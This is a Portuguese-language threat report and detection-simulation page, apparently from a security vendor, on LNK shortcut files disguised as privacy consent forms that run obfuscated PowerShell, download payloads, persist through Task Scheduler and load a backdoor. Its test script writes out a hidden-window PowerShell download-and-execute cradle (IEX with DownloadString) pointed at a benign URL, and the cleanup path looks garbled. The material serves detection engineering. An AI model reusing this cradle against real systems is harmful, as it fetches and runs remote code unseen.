SOC Prime Bias: Alto

19 Jun 2026 07:26 UTC

O Que Realmente Estava Dentro do Arquivo de Atalho Disfarçado como um Formulário de Consentimento de Privacidade?

Author Photo
SOC Prime Team linkedin icon Seguir
O Que Realmente Estava Dentro do Arquivo de Atalho Disfarçado como um Formulário de Consentimento de Privacidade?
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Atores de ameaças estão distribuindo arquivos LNK maliciosos disfarçados como formulários de consentimento de privacidade para enganar os usuários a abri-los. Quando executados, esses arquivos de atalho lançam comandos PowerShell ofuscados que recuperam e executam cargas adicionais usando técnicas sem arquivo. A cadeia de ataque é projetada para roubar informações e implantar um carregador de backdoor que ajuda a preservar o acesso e a persistência.

Investigação

A investigação mostrou que os arquivos LNK embutem código PowerShell ofuscado responsável por baixar scripts posteriores. Esses scripts secundários incluem um downloader que obtém cargas úteis de serviços web legítimos e um carregador que os executa diretamente na memória. O autor da ameaça também abusa do Agendador de Tarefas do Windows para persistência e usa documentos de isca para fazer parecer que a atividade maliciosa é legítima.

Mitigação

As organizações devem impor verificação rigorosa de extensões de arquivos e alertar os usuários sobre arquivos LNK disfarçados como documentos comuns. As equipes de segurança devem monitorar de perto a atividade do Agendador de Tarefas, logs de execução do PowerShell e conexões de rede de saída. Os usuários também devem ser treinados para validar tanto o remetente quanto o caminho de entrega de qualquer arquivo recebido antes de abri-lo.

Resposta

Se essa atividade for detectada, os administradores devem revisar imediatamente entradas suspeitas do Agendador de Tarefas e a criação incomum de scripts PowerShell em diretórios acessíveis por usuários. Os logs do PowerShell devem ser analisados e as conexões externas devem ser rastreadas, especialmente aquelas envolvendo plataformas de nuvem legítimas ou serviços de armazenamento web. Uma investigação forense completa deve ser realizada em quaisquer scripts maliciosos identificados e tráfego de rede não autorizado.

graph TB %% Definição das classes classDef initial_access fill:#f96,stroke:#333,stroke-width:2px classDef execution fill:#69f,stroke:#333,stroke-width:2px classDef persistence fill:#6c6,stroke:#333,stroke-width:2px classDef discovery fill:#ff9,stroke:#333,stroke-width:2px classDef exfiltration fill:#f66,stroke:#333,stroke-width:2px %% Etapa de acesso inicial action_user_exec[“<b>Ação</b> – <b>T1204.002 User Execution: Malicious File</b><br/>A vítima executa um arquivo de atalho .LNK enganoso<br/>disfarçado como um formulário de consentimento.”] class action_user_exec initial_access action_masquerade[“<b>Ação</b> – <b>T1036.008 Masquerading: Masquerade File Type</b><br/>O arquivo .LNK imita um formulário legítimo<br/>de consentimento de informações pessoais.”] class action_masquerade initial_access %% Etapa de execução action_obfuscation[“<b>Ação</b> – <b>T1027.009 Obfuscated Files or Information: Embedded Payloads</b><br/>O arquivo .LNK contém uma carga útil<br/>de script PowerShell ofuscada.”] class action_obfuscation execution action_cloud_api[“<b>Ação</b> – <b>T1059.009 Command and Scripting Interpreter: Cloud API</b><br/>O script PowerShell utiliza serviços em nuvem<br/>para baixar scripts maliciosos adicionais.”] class action_cloud_api execution action_proxy_exec[“<b>Ação</b> – <b>T1216 System Script Proxy Execution</b><br/>O malware utiliza execução por proxy<br/>de scripts do sistema para manter baixa visibilidade.”] class action_proxy_exec execution action_reflective_load[“<b>Ação</b> – <b>T1620 Reflective Code Loading</b><br/>Os scripts baixados são executados na memória<br/>usando métodos sem arquivos.”] class action_reflective_load execution %% Etapa de persistência action_scheduled_task[“<b>Ação</b> – <b>T1053 Scheduled Task/Job</b><br/>Uma tarefa é registrada no Agendador de Tarefas do Windows<br/>para garantir a execução após a reinicialização.”] class action_scheduled_task persistence %% Etapa de descoberta action_sys_info[“<b>Ação</b> – <b>T1082 System Information Discovery</b><br/>O script PowerShell coleta detalhes do sistema operacional,<br/>configurações de rede e endereços IP.”] class action_sys_info discovery action_query_reg[“<b>Ação</b> – <b>T1012 Query Registry</b><br/>O script consulta o registro para identificar<br/>processos em execução e produtos de segurança.”] class action_query_reg discovery %% Etapa de objetivo action_backdoor[“<b>Ação</b> – <b>Backdoor loader-type</b><br/>Mantém o acesso e permite a execução<br/>de atividades maliciosas adicionais.”] class action_backdoor exfiltration action_selective_exclusion[“<b>Ação</b> – <b>T1679 Selective Exclusion</b><br/>O backdoor permite exclusões seletivas<br/>para contornar controles de segurança.”] class action_selective_exclusion exfiltration %% Fluxo de conexões action_user_exec –>|leva_a| action_masquerade action_masquerade –>|aciona| action_obfuscation action_obfuscation –>|contém| action_cloud_api action_cloud_api –>|implanta| action_proxy_exec action_proxy_exec –>|executa| action_reflective_load action_reflective_load –>|estabelece| action_scheduled_task action_scheduled_task –>|executa| action_sys_info action_sys_info –>|leva_a| action_query_reg action_query_reg –>|informa| action_backdoor action_backdoor –>|habilita| action_selective_exclusion

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Cheque Pré-Voo de Telemetria e Base deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos errados.

  • Narrativa do Ataque & Comandos: O adversário busca estabelecer acesso inicial e baixar uma carga de malware de segunda fase. Para evitar a detecção por scanners de arquivos simples, usam um arquivo LNK (Atalho). Este arquivo LNK é projetado para executar powershell.exe em uma janela oculta. O comando passado para o PowerShell usa Invoke-Expression and DownloadString para puxar um script de uma URL remota. Isso imita ataques reais de “Living-off-the-Land” (LotL) onde binários legítimos são usados para executar ações maliciosas, visando burlar antivírus baseados em assinaturas tradicionais.

  • Script de Teste de Regressão:

    # 1. Defina a URL de destino (usando um site benigno para teste)
    $url = "https://www.google.com"
    
    # 2. Crie a string de carga útil maliciosa de PowerShell
    # Esta string é projetada para acionar a detecção de 'DownloadString' e 'Invoke-Expression'
    $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')"
    
    # 3. Crie um conteúdo de arquivo LNK fictício (Simulado)
    # Em um ataque real, este seria um arquivo .lnk binário. 
    # Aqui executamos o comando diretamente para garantir que o log ScriptBlock seja gerado para validação.
    Write-Host "[+] Simulando execução maliciosa de PowerShell via carga útil LNK..."
    powershell.exe -WindowStyle Hidden -Command $payload
    
    Write-Host "[+] Comando de simulação executado. Verifique o Evento ID 4104."
  • Comandos de Limpeza:

    # Remova quaisquer artefatos se arquivos foram criados
    Remove-Item -Path "$HOMEDesktopSimulated_Malicious_LNK.lnk" -ErrorAction SilentlyContinue
    Write-Host "[+] Limpeza completa."